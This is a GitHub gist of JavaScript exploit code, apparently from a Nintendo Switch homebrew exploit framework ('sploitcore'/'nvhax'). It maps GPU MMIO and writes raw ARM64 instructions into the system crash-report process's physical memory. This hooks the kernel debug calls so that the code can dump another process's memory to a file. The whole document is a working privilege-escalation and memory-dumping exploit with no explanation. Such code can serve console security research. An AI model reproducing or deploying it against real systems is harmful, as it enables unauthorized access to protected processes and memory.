Skip to content

Instantly share code, notes, and snippets.

@hexkyz
Created December 28, 2018 19:52
Show Gist options
  • Save hexkyz/b2897f27dbaf3e5a450b4bdc587fafa5 to your computer and use it in GitHub Desktop.
Save hexkyz/b2897f27dbaf3e5a450b4bdc587fafa5 to your computer and use it in GitHub Desktop.
sploitcore.prototype.nvhax_patch_creport = function(ch_base_addr, dram_addr, pid, mem_offset, mem_size) {
var gpu_va = [0, 0x04];
var dram_base_addr = (dram_addr & 0xFFF00000);
var dram_offset = (dram_addr & 0x000F0000);
// Map GPU MMIO
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000);
// Patch the channel with the base DRAM address
var ch_iova = this.nvhax_patch_channel(ch_base_addr, dram_base_addr);
// Write target PID somewhere
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A000), pid);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A008), 0);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A010), mem_size);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x2A018), mem_offset);
// Replace "nnMain" branch
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x000D8), 0x9400595A);
// Install svcDebugActiveProcess hook
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16640), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16644), 0xF9400081);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16648), 0xD4000C01);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1664C), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16650), 0xB9002080);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16654), 0xB9002481);
// Install svcGetDebugEvent hook (process)
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16658), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1665C), 0x91010080);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16660), 0xB9402481);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16664), 0xD4000C61);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16668), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1666C), 0xB9003080);
// Install svcGetDebugEvent hook (thread)
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16670), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16674), 0x91010080);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16678), 0xB9402481);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1667C), 0xD4000C61);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16680), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16684), 0xB9003080);
// Install svcReadDebugProcessMemory hook
if (mem_size == 0x4000)
{
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0x90000064);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91100080);
}
else
{
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16688), 0xF0000044);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1668C), 0x91000080);
}
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16690), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16694), 0xF9400C85);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x16698), 0xF8424081);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x1669C), 0xF9403082);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A0), 0x8B050042);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A4), 0xB9401083);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166A8), 0xD4000D41);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166AC), 0x900000A4);
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B0), 0xB9007080);
// Return
this.nvhax_peephole_write32(gpu_io_vaddr, ch_iova, utils.add2(gpu_va, dram_offset + 0x166B4), 0xD65F03C0);
return [gpu_io_vaddr, ch_iova];
}
sploitcore.prototype.nvhax_dump_proc = function(sm_handle, ch_base_addr, pid, start_offset, end_offset, is_small) {
var tmp_mem_buf = utils.add2(this.nvdrv_exp_ctx[6], 0x40000);
var creport_tid = [0x00000036, 0x01000000];
var creport_dram_addr = 0x94950000;
var data_gpu_va = [0x71000, 0x4];
var status_gpu_va = [0x7A000, 0x4];
var mem_offset = start_offset;
var mem_size = 0x8000;
var mem_read_state = 0;
// Use smaller blocks instead
if (is_small)
{
data_gpu_va = [0x72400, 0x4];
mem_size = 0x4000;
}
// Allocate memory buffer
var mem_buf = this.malloc(mem_size);
while (!mem_read_state && (mem_offset < end_offset))
{
// Launch creport in waiting state
var proc_pid = this.launch_proc(sm_handle, 0x03, creport_tid, "120", 0x02);
// Patch creport
var ctx_res = this.nvhax_patch_creport(ch_base_addr, creport_dram_addr, pid, mem_offset, mem_size);
// Get context
var gpu_io_vaddr = ctx_res[0];
var ch_iova = ctx_res[1];
// Start patched creport
this.start_proc(sm_handle, proc_pid);
// Copy memory into nvservices
this.nvhax_dram_memcpy(gpu_io_vaddr, ch_iova, data_gpu_va, tmp_mem_buf, mem_size);
// Copy memory from nvservices
this.do_nvdrv_memcpy_out(mem_buf, tmp_mem_buf, mem_size);
// Dump memory
this.memdump(mem_buf, mem_size, "memdumps/dram.bin");
// Increase source memory offset
mem_offset += mem_size;
// Check debug SVC result
mem_read_state = this.nvhax_peephole_read32(gpu_io_vaddr, ch_iova, utils.add2(status_gpu_va, 0x70));
}
this.free(mem_buf);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment